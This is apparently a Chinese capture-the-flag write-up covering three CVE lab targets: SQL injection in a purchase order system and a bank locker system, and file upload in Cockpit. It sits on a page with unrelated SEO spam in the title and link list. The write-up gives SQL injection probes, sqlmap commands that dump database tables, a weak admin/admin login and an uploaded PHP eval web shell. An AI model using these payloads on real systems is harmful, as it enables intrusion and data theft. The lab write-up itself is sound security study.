当前位置: 首页 > news >正文

美女做艾网站预防电信网络诈骗

美女做艾网站,预防电信网络诈骗,一个域名可以做两个网站吗,开发日记CVE-2023-2130 靶标介绍: 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。 通过标靶介绍可以知道…

CVE-2023-2130

靶标介绍:

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞,访问该页面

当参数id=1' and 1=1 --+时正确,id=1' and 1=2 --+时错误,说明存在sql注入漏洞。

抓包,把请求信息保存到5.txt文件中,sqlmap梭哈

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D purchase_order_db --tables

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump

得到flag

CVE-2023-1313

靶标介绍:

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

一个登录界面,他的提升通过/install来运行安装,访问/install,但是重定向到了原登录界面,dirsearch进行目录扫描,

 可以看到存在该目录,但是不能够访问,尝试弱口令登录

admin    /      admin

成功登录进去,

找上传页面

上传一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

上传成功后下载,浏览后得到上传目录

访问该路径

可以看到配置文件界面,说明上传成功,连接蚁剑

CVE-2023-0562

靶标介绍:

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

存在mysqli扩展,有数据库,可能存在sql注入,寻找注入点

在这个地方搜索会进行POST传参,然后重定向到该页面

抓包测试

把抓包的内容放到5.txt文件中

searchinput=*    *会默认把该参数作为注入点

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D blmsdb --tables

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump

http://www.hengruixuexiao.com/news/51757.html

相关文章:

  • 朝阳周边网站建设2022磁力链接搜索引擎推荐
  • 云南高端网站建设公司黄页网站推广app咋做广告
  • 网站建设岗位浙江网站推广
  • 当今做那些网站能致富广东省各城市疫情搜索高峰进度
  • 衡阳做网站的公司抖音seo优化系统招商
  • 云瓣科技做网站衡阳seo优化
  • 找国外人做网站百度搜索引擎官网
  • 网站建设能挣钱新乡网站优化公司价格
  • 网站建设 网站百度网盘电话人工服务
  • 重庆网站建设公司联系方式优化设计三年级上册语文答案
  • 具有品牌的福州网站建设seopeix
  • 比较好的网站建设平台google免登录网页版
  • 天津网站建设哪家权威上海搜索优化推广
  • 万表网欧米茄seo建站的步骤
  • php做网站教程免费关键词搜索引擎工具
  • 网站开发建设费用网络推广是什么
  • 所有外包网站怎样做一个网页
  • 邮箱登陆嵌入网站windows优化大师是官方的吗
  • 百度站长提交网址移动网站推广如何优化
  • 鸡蛋做网站百度信息流投放方式有哪些
  • 济南企业做网站网站关键词怎么快速上排名
  • 电商小程序报价北京seo招聘
  • 网站开发主流框架seo网络推广师招聘
  • dede医院网站模板下载关键词搜索引擎优化推广
  • 泰安优化公司搜索引擎优化免费
  • 哪个网站可以学做衣服如何做网络推广赚钱
  • 郑州做商城网站公司广州seo网站排名
  • 做网站版头蓝色图片微信推广方式有哪些
  • 优化英文春哥seo博客
  • 网页设计与制作课程标准构建木卢seo教程